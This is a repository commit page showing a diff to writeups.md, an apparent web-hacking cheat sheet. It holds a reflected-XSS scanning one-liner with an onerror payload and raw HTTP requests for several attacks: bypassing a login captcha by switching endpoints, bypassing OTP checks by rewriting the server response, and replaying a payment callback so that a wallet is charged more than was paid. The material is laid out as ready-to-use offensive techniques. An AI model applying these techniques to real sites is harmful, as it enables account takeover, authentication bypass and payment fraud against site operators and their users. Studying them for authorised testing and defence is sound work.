vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update writeups.md

Browse Source
This commit is contained in:
Mehdi 2024-08-03 08:28:58 +03:30 committed by GitHub
parent 7255d24011
commit 5433b32584
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 81 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

82
writeups.md
View File

@ -8,7 +8,7 @@ dirsearch -u “https://target.com” -t 150 -x 403,404,500,429 -i 200,301,302 -
## Reflected XSS (Non-Persistent XSS)
```bash
# XSS one liner
echo "testphp.vulnweb.com" | gauplus | grep "?" | qsreplace 'xssz"><img/src=x onerror=confirm(999)><!--' | httpx -mr '"><img/'
echo "target.com" | gauplus | grep "?" | qsreplace 'xssz"><img/src=x onerror=confirm(999)><!--' | httpx -mr '"><img/'
```
**What this command do?**
@ -22,6 +22,86 @@ If a site is reflecting the host header in the response even when you it to some
This is common on `Apache` servers when the bottom line of an error page reads something like **Apache Server at example.com Port 443** because example.com is simply being reflected from the host header in the request.
## Captcha Bypass
1. The following request is related to entering the system:
```html
POST /Auth/LoginWithPasswordCaptcha HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
---snip---
Connection: close{"username":"XXXXX","password":"111111","deviceName":"Netscape-5.0 (Windows)","captchaCode":"acvb","captchaId":"77e148fc-9fb8-48a5-af25-699761fbb223","deviceInfo":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"}
```
2. If the attacker deletes the captcha code variable in the body and changes /Auth/LoginWithPasswordCaptcha to /Auth/LoginWithPassword in the url, the implemented captcha mechanism will be bypassed and the attacker can implement it this way. make a pervasive search attack.
```html
POST /Auth/LoginWithPassword HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
---snip---
Connection: close{"username":"XXXXX","password":"111111","deviceName":"Netscape-5.0 (Windows)","deviceInfo":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"}
```
## OTP Bypass
1. The following request is a request to check the otp in the digital signature section:
```html
POST /SignatureCertificate/CheckOtp HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
---snip---
```
2. If the entered otp is wrong, the following answer will be returned:
```html
HTTP/1.1 400 Bad Request
Server: nginx
Content-Type: application/json; charset=utf-8
Set-Cookie: cookiesession1=678B286C2DE65BDFC274EB1DEB4B88A6;Expires=Tue, 29 Jul 2025 11:54:43 GMT;Path=/;HttpOnly
---snip---
{"isFailed":true,"isSuccess":false,"reasons":[{"message":"Your code has expired! Please get a new code!","metadata":{}}]," errors":[{"reasons":[],"message":"Your code has expired! Please get a new code!","metadata":{}}],"successes":[]}
```
3. If the attacker sets the `isFailed` value to `False` and the `isSuccess` value to `True` in this **response**, he can easily bypass the OTP authentication mechanism without having access to the correct code!
## Wallet Charging Bypass
1. By using this attack, the attacker can pay a smaller amount and charge a larger amount to his wallet by changing the tokens. First, buy 5$ normally in the charging section of the wallet and do not send the call back request, drop it and intercept it:
**Sample call back request**
```html
POST /ResultTransaction?trackingCode=51376940 HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
---snip---
Token=28907420839252952&OrderId=51376940&TerminalNo=85053207&RRN=743808093455&status=0&HashCardNumber=1AAC1ADAF6CB22AC0D404DBF729427517001DB42EC74282B0A182A2B011968CF&Amount=100%2C000&SwAmount=&STraceNo=400534&DiscoutedProduct=
```
2. Then make a new payment with a higher amount and click cancel at the time of payment and intercept the corresponding call back and put the body of the previous request in this request and finally put the `orderId` of the higher amount request in the request.
3. Final request:
```html
POST /ResultTransaction?trackingCode=51489803 HTTP/1.1
Host: target.com
---snip---
Token=28907420839252952&OrderId=51489803&TerminalNo=8521900539207&RRN=743807548093455&status=0&HashCardNumber=1AAC1ADAF6CB22AC450D404DBF7294277517001DB42EC74282B0A182A2B011968CF&Amount=100%2C000&SwAmount=&STraceNo=400534&DiscoutedProduct==
```
* Finally, the message of unsuccessful transaction is displayed to the user, but the **wallet is charged successfully**.